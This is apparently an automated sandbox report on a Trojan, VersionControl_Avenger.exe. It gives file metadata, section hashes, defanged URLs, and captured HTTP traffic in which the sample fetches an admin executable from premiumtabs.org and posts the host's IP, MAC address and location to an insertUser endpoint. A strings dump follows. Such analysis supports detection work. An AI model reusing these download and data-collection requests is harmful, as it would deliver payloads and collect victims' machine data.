Company Name: AvengerProduct Name: AvengerProduct Version: 1.0.0.1Legal Copyright: (c) Avenger. All rights reserved.Legal Trademarks: Original Filename: VersionControl_Avenger.exeInternal Name: VersionControl_Avenger.exeFile Version: 1.0.0.1File Description: VersionControl_AvengerComments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2470641 | 2470912 | 4.26697 | 1783042eb760f0f968fb6c29cd89929d |
.rdata | 2478080 | 421442 | 421888 | 3.50495 | 9462027653056859d555cb9f9975eed5 |
.data | 2899968 | 58532 | 26624 | 3.37498 | 101026e78c240edb7eccb679b8adcf26 |
.rsrc | 2961408 | 18668 | 18944 | 2.54166 | d36431642d50f0eb0306538408d86cf4 |
.reloc | 2981888 | 239290 | 239616 | 3.40336 | ce35aec385a9937ce60adba634d0e116 |
Dropped from:
d7d0f7004f0b49cc9ae1f0091f2950ff
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://premiumtabs.org/avenger/index.php/api/check_version?data={"id":"1"} | 162.251.86.104 |
hxxp://premiumtabs.org/avenger/uploads/Avenger_v1.3(Admin).exe | 162.251.86.104 |
hxxp://www.telize.com/geoip?callback= | 185.24.220.241 |
hxxp://demo1.geniesoftsystem.com/avenger/index.php/api/check_version?data={"id":"1"} | 125.99.110.190 |
hxxp://demo1.geniesoftsystem.com/avenger/index.php/api/insertUser?data={"userid":"1","ip_ address":"193.138.244.231","mac_address":"00-0C-29-5C-94-6 4","browser_name":"IE,Mozila,Chrome","operating":"Wind ows","create_date":"2015-07-15 20:55:24","location":%2 2Ukraine"} | 125.99.110.190 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /avenger/index.php/api/check_version?data={"id":"1"} HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: premiumtabs.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 15 Jul 2015 17:55:07 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.37
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
b4..{"data":{"userid":"1","user_name":"admin","current_version":"1.3","download_url":"premiumtabs.org\/avenger\/uploads\/Avenger_v1.3(Admin).exe","last_updated":"2015-04-14 19:07:29"}}..0......
GET /avenger/uploads/Avenger_v1.3(Admin).exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: premiumtabs.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 15 Jul 2015 17:55:09 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Tue, 14 Apr 2015 13:37:29 GMT
ETag: "33b6ff0-1ce7f2-513af54f37840"
Accept-Ranges: bytes
Content-Length: 1894386
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......P.. H...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...`...............................rsrc... H...P...J...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /avenger/index.php/api/check_version?data={"id":"1"} HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: demo1.geniesoftsystem.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 15 Jul 2015 17:47:26 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 190
Connection: close
Content-Type: text/html; charset=UTF-8
{"data":{"userid":"1","user_name":"admin","current_version":"1.3","download_url":"demo1.geniesoftsystem.com\/avenger\/uploads\/Avenger_v1.3(Admin).exe","last_updated":"2015-04-14 19:07:29"}}..
?? /avenger/index.php/api/insertUser?data={"userid":"1","ip_address":"193.138.244.231","mac_address":"00-0C-29-5C-94-64","browser_name":"IE,Mozila,Chrome","operating":"Windows","create_date":"2015-07-15 20:55:24","location":%22Ukraine"} HTTP/1.1..Accept: */*..Accept-Language: en-us..Content-Type: application/x-www-form-urlencoded..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)..Host: demo1.geniesoftsystem.com..Content-Length: 0..Connection: Keep-Alive..Cache-Control: no-cache....
HTTP/1.1 200 OK
Date: Wed, 15 Jul 2015 17:47:25 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 64
Connection: close
Content-Type: text/html; charset=UTF-8
{"response":"success","message":"Record inserted successfully."}..
GET /geoip?callback= HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.telize.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 15 Jul 2015 17:55:18 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 326
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Origin: *
{"longitude":36.2527,"latitude":49.9808,"asn":"AS34323","offset":"3","ip":"193.138.244.231","area_code":"0","continent_code":"EU","dma_code":"0","city":"Kharkov","timezone":"Europe\/Zaporozhye","region":"Kharkivs'ka Oblast'","country_code":"UA","isp":"IP-Com Ltd","country":"Ukraine","country_code3":"UKR","region_code":"07"}...
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1888:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
hCMd
hCMd
actualKey
actualKey
J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI
J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI
t.hd!g
t.hd!g
j.hHGi
j.hHGi
E:\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
E:\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
AtlThrow: hr = 0x%x
AtlThrow: hr = 0x%x
E:\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
E:\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
Warning: implicit LoadString(%u) failed
Warning: implicit LoadString(%u) failed
E:\Microsoft Visual Studio 10.0\VC\include\xiosbase
E:\Microsoft Visual Studio 10.0\VC\include\xiosbase
E:\Microsoft Visual Studio 10.0\VC\include\streambuf
E:\Microsoft Visual Studio 10.0\VC\include\streambuf
E:\Microsoft Visual Studio 10.0\VC\include\xlocale
E:\Microsoft Visual Studio 10.0\VC\include\xlocale
hXXp://
hXXp://
(Admin).exe
(Admin).exe
download_url
download_url
VersionControl_Glob.cpp
VersionControl_Glob.cpp
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
hXXp://premiumtabs.org/avenger/index.php/api/check_version?data={"id":"1"}
hXXp://premiumtabs.org/avenger/index.php/api/check_version?data={"id":"1"}
C:\Windows\verson_Avenger.txt
C:\Windows\verson_Avenger.txt
VersionControl_GlobDlg.cpp
VersionControl_GlobDlg.cpp
CACHE_S_FORMATETC_NOTSUPPORTED
CACHE_S_FORMATETC_NOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
CO_E_SERVER_EXEC_FAILURE
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
OLE_E_ADVISENOTSUPPORTED
OLE_E_ADVISENOTSUPPORTED
REGDB_E_KEYMISSING
REGDB_E_KEYMISSING
CACHE_E_FIRST...CACHE_E_LAST
CACHE_E_FIRST...CACHE_E_LAST
CACHE_S_FIRST...CACHE_S_LAST
CACHE_S_FIRST...CACHE_S_LAST
CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST
CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST
CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST
CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST
CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST
CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST
CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST
CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST
CLIPBRD_E_FIRST...CLIPBRD_E_LAST
CLIPBRD_E_FIRST...CLIPBRD_E_LAST
CLIPBRD_S_FIRST...CLIPBRD_S_LAST
CLIPBRD_S_FIRST...CLIPBRD_S_LAST
CONVERT10_E_FIRST...CONVERT10_E_LAST
CONVERT10_E_FIRST...CONVERT10_E_LAST
CONVERT10_S_FIRST...CONVERT10_S_LAST
CONVERT10_S_FIRST...CONVERT10_S_LAST
CO_E_FIRST...CO_E_LAST
CO_E_FIRST...CO_E_LAST
CO_S_FIRST...CO_S_LAST
CO_S_FIRST...CO_S_LAST
DATA_E_FIRST...DATA_E_LAST
DATA_E_FIRST...DATA_E_LAST
DATA_S_FIRST...DATA_S_LAST
DATA_S_FIRST...DATA_S_LAST
DRAGDROP_E_FIRST...DRAGDROP_E_LAST
DRAGDROP_E_FIRST...DRAGDROP_E_LAST
DRAGDROP_S_FIRST...DRAGDROP_S_LAST
DRAGDROP_S_FIRST...DRAGDROP_S_LAST
ENUM_E_FIRST...ENUM_E_LAST
ENUM_E_FIRST...ENUM_E_LAST
ENUM_S_FIRST...ENUM_S_LAST
ENUM_S_FIRST...ENUM_S_LAST
INPLACE_E_FIRST...INPLACE_E_LAST
INPLACE_E_FIRST...INPLACE_E_LAST
INPLACE_S_FIRST...INPLACE_S_LAST
INPLACE_S_FIRST...INPLACE_S_LAST
MARSHAL_E_FIRST...MARSHAL_E_LAST
MARSHAL_E_FIRST...MARSHAL_E_LAST
MARSHAL_S_FIRST...MARSHAL_S_LAST
MARSHAL_S_FIRST...MARSHAL_S_LAST
MK_E_FIRST...MK_E_LAST
MK_E_FIRST...MK_E_LAST
MK_S_FIRST...MK_S_LAST
MK_S_FIRST...MK_S_LAST
OLEOBJ_E_FIRST...OLEOBJ_E_LAST
OLEOBJ_E_FIRST...OLEOBJ_E_LAST
OLEOBJ_S_FIRST...OLEOBJ_S_LAST
OLEOBJ_S_FIRST...OLEOBJ_S_LAST
OLE_E_FIRST...OLE_E_LAST
OLE_E_FIRST...OLE_E_LAST
OLE_S_FIRST...OLE_S_LAST
OLE_S_FIRST...OLE_S_LAST
REGDB_E_FIRST...REGDB_E_LAST
REGDB_E_FIRST...REGDB_E_LAST
REGDB_S_FIRST...REGDB_S_LAST
REGDB_S_FIRST...REGDB_S_LAST
VIEW_E_FIRST...VIEW_E_LAST
VIEW_E_FIRST...VIEW_E_LAST
VIEW_S_FIRST...VIEW_S_LAST
VIEW_S_FIRST...VIEW_S_LAST
FACILITY_WINDOWS
FACILITY_WINDOWS
severity: %s, facility: %s ($lX)
severity: %s, facility: %s ($lX)
range: %s ($lX)
range: %s ($lX)
%s ($lX)
%s ($lX)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
Warning: constructing COleException, scode = %s.
Warning: constructing COleException, scode = %s.
f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h
CNotSupportedException
CNotSupportedException
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl
KERNEL32.DLL
KERNEL32.DLL
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
%s%s.dll
%s (%s:%d)
%s (%s:%d)
lX-X-x-XX-XXXXXX
lX-X-x-XX-XXXXXX
m_msgCur = {
m_msgCur = {
m_pszExeName =
m_pszExeName =
m_nCmdShow =
m_nCmdShow =
m_lpCmdLine =
m_lpCmdLine =
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelpx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelpx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
IGNORING command id 0xX sent to %hs dialog.
IGNORING command id 0xX sent to %hs dialog.
Routing command id 0xX to app.
Routing command id 0xX to app.
Routing command id 0xX to owner window.
Routing command id 0xX to owner window.
Warning: Creating dialog from within a COleControlModule application is not a supported scenario.
Warning: Creating dialog from within a COleControlModule application is not a supported scenario.
Warning: ExecuteDlgInit failed during dialog init.
Warning: ExecuteDlgInit failed during dialog init.
ERROR: Dialog with IDD 0xX must have the child style.
ERROR: Dialog with IDD 0xX must have the child style.
ERROR: Dialog named '%s' must have the child style.
ERROR: Dialog named '%s' must have the child style.
ERROR: Dialog with IDD 0xX must be invisible.
ERROR: Dialog with IDD 0xX must be invisible.
ERROR: Dialog named '%s' must be invisible.
ERROR: Dialog named '%s' must be invisible.
ERROR: Cannot find dialog template with IDD 0xX.
ERROR: Cannot find dialog template with IDD 0xX.
ERROR: Cannot find dialog template named '%s'.
ERROR: Cannot find dialog template named '%s'.
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdlgs.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdlgs.inl
CCmdTarget
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp
SENDING control notification %d from control id 0xX to %hs window.
SENDING control notification %d from control id 0xX to %hs window.
SENDING command id 0xX to %hs target.
SENDING command id 0xX to %hs target.
No handler for command ID 0xX, disabling it.
No handler for command ID 0xX, disabling it.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp
m_nMsgLast =
m_nMsgLast =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp
RegOpenKeyTransactedA
RegOpenKeyTransactedA
Advapi32.dll
Advapi32.dll
RegCreateKeyTransactedA
RegCreateKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp
MRU: open file (%d) '%s'.
MRU: open file (%d) '%s'.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp
Error: failed to load message box prompt string 0xx.
Error: failed to load message box prompt string 0xx.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshellmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshellmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
Warning: unknown WM_MEASUREITEM for menu item 0xX.
Warning: unknown WM_MEASUREITEM for menu item 0xX.
Can't register window class named %s
Can't register window class named %s
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
user32.dll
user32.dll
WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
Implementation Warning: control notification = $%X.
Implementation Warning: control notification = $%X.
Warning: not executing disabled command %d
Warning: not executing disabled command %d
hWnd = $X (nIDC=$X) is not a %hs.
hWnd = $X (nIDC=$X) is not a %hs.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h
commctrl_DragListMsg
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
m_ps.rcPaint =
m_ps.rcPaint =
m_ps.fErase =
m_ps.fErase =
m_ps.hdc =
m_ps.hdc =
lgpn.lopnColor =
lgpn.lopnColor =
lgpn.lopnWidth.x (width) =
lgpn.lopnWidth.x (width) =
lgpn.lopnStyle =
lgpn.lopnStyle =
lb.lbColor =
lb.lbColor =
lb.lbHatch =
lb.lbHatch =
lb.lbStyle =
lb.lbStyle =
lf.lfFaceName =
lf.lfFaceName =
lf.lfPitchAndFamily =
lf.lfPitchAndFamily =
lf.lfQuality =
lf.lfQuality =
lf.lfClipPrecision =
lf.lfClipPrecision =
lf.lfOutPrecision =
lf.lfOutPrecision =
lf.lfCharSet =
lf.lfCharSet =
lf.lfStrikeOut =
lf.lfStrikeOut =
lf.lfUnderline =
lf.lfUnderline =
lf.lfItalic =
lf.lfItalic =
lf.lfWeight =
lf.lfWeight =
lf.lfOrientation =
lf.lfOrientation =
lf.lfEscapement =
lf.lfEscapement =
lf.lfWidth =
lf.lfWidth =
lf.lfHeight =
lf.lfHeight =
bm.bmBitsPixel =
bm.bmBitsPixel =
bm.bmPlanes =
bm.bmPlanes =
bm.bmWidthBytes =
bm.bmWidthBytes =
bm.bmWidth =
bm.bmWidth =
bm.bmHeight =
bm.bmHeight =
bm.bmType =
bm.bmType =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp
CLSID\%s
CLSID\%s
Interface\%s
Interface\%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp
mfcm100d.dll
mfcm100d.dll
QueryInterface(%s) failed
QueryInterface(%s) failed
QueryInterface(%s) succeeded
QueryInterface(%s) succeeded
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp
AppMsg
AppMsg
WinMsg
WinMsg
CmdRouting
CmdRouting
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
shell32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.
Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdatarecovery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdatarecovery.cpp
lXXxXXXXXXXX
lXXxXXXXXXXX
RegDeleteKeyExA
RegDeleteKeyExA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp
%s:%x:%x:%x:%x
%s:%x:%x:%x:%x
Shell32.dll
Shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp
0xx
0xx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrmx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrmx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbasepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbasepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbar.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbar.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxvisualmanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxvisualmanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcontrolbarutil.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcontrolbarutil.h
%sMFCToolBar-%d%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBar-%d
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsettingsstore.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsettingsstore.h
%sMFCToolBarParameters
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
TOOLBAR_RESETKEYBAORD
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenu.cpp
&%d %s
&%d %s
Can't import menu
Can't import menu
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin4.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin4.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertoolsmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertoolsmanager.cpp
Too many user-defined tools. The max. number is %d
Too many user-defined tools. The max. number is %d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp
CFile exception: %hs, File %s, OS error information = %ld.
CFile exception: %hs, File %s, OS error information = %ld.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp
